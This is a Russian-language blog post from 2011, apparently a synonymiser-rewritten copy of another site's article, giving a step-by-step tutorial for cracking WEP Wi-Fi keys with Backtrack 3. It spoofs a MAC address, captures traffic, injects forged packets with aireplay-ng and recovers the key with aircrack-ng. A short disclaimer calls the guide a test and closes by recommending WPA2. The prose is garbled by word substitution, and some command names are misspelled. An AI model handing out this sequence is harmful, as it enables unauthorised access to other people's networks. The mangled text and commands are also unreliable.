Среда, 25.06.2025, 22:41

||здесь может быть ваша реклама||                                 ||здесь может быть ваша реклама||
Блоггер,Форумчанин,Сайтовед,Дизайнер - это все у нас!
Главная Регистрация Вход
Приветствую Вас, Гость · RSS
Меню сайта
Наш баннер
Поиск
Наш опрос
Какая у Вас ОС?
Всего ответов: 18
Будь с нами
Мы везде!
Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0
Счетчик
 
Главная » 2011 » Апрель » 22 » Взламываем WEP,с использованием Backtrack 3
08:44
Взламываем WEP,с использованием Backtrack 3


Я теснее повествовал в данном блоге про Backtrack, в этой ведь заметке мы осмотрим одно из главнейших его применений. То, о нежели я буду говорить в этой заметке, я теснее публиковал, хотя повторяющий вид колёсиков с ютуба. В этой заметке я поясню все конкретнее. Не ненужным станет обнаружить, собственно это пособие создано для тестовых целей, и вовсе не ставит собственной целью взращивание хакеров. В этой объяснено каким образом возможно взломать 64bit и 128bit WEP шифрование на разных WIFI роутерах используя Backtrack, live-дистрибутив Linux. Я исполнял описанные воздействия на ноутбуках IBM Thinkpad x60, Acer 5672 и  WIFI чипсет в данных машинках трудился очень хорошо.

Требования:

Backtrack 3 на Компакт -диски либо USB

Комп с поддерживаемой беспроводной картой 802.11

Wireless Access point либо WIFI роутер, использующий WEP шифрование

Подготавливаем WIFI карту

В первую очередь нам следует перевести карту в режим "Monitor Mode”. Раз вы примете на вооружение чипчет Intel® PRO/Wireless 3945ABG сделаете грядущую команду:

modprobe -r iwl3945 modprobe ipwraw

Затем нам следует приостановить нашу WIFI карту:

iwconfig

Взгляни под каким именованием заметен ваш беспроводной интерфейс, затем одернете его командой:

airmon-ng stop [device]

Потом:

ifconfig down [interface]

Изменяем MAC адресок прибора:

macchanger --mac 00:11:22:33:44:66 [device]

Запускаем карту:

airmon-ng start [device]

Начинаем атаку

И уже пришло время отыскать подобающую сеть для атаки. Запускаем команду:

airodump-ng [device]

Мы видим легкодоступные сети, например MAC адресок (BSSID), канал (CH) и фамилия (ESSID). Сейчас мы начнем собирать эти с WIFI роутера для атаки:

airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

Команда повыше поместит приобретенные эти в файл network.out. Данный файл потребуется , нам позже как скоро мы станем готовы ломать WEP ключ.

Откройте иное окошко шелла и оставьте предшествующую команду выполняться. И уже ведь мы сгенерируем немного фальшивых пакетов к роутеру для ускорения сбора этих. Примите на вооружение грядущую команду:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

В случае если команда повыше прошла удачно, мы станем генерить много пакетов на ломаемую сеть. Введите:

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

Это принудит точку доступа отправить много пакетов, которые у нас появится возможность принимать на вооружение для взлома WEP ключа. Выясните ваш оставленный в первом окошке шелла aerodump-ng. Вы обязаны узреть там поле "data”, в каком теснее очень большое количество пакетов.


Как скоро значение данного поля добивается 10,000-20,000 у вас есть возможность начинать взлом ключа. В случае если нет иных легкодоступных сеток, можно испробовать команду:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device] 

 

Как скоро мы наберем довольно много пакетов, начинаем взлом:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

Параметр "-n 128 показывает на 128-битный WEP ключ. В случае если взлом не выйдет, используйте  "-n 64


Все, наш взлом закончился! Ключ обнаружен и нам осталось лишь удалить из вывода знаки :

Примите на вооружение эту технику для презентации беспомощности WEP шифрования. Рассчитываю лично вы примете на вооружение WPA2 в ваших сетях.

_____________________________________________________________________

информация взята с сайта  http://guruadmin.ru

Просмотров: 2406 | Добавил: san4o2 | Рейтинг: 3.0/2
Всего комментариев: 0
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
© Copyright 2025 CopywRite Development
Блог о SEO
Мини профиль

Привет:Гость


Мини-чат
200
Календарь
«  Апрель 2011  »
Пн Вт Ср Чт Пт Сб Вс
    123
45678910
11121314151617
18192021222324
252627282930
Архив записей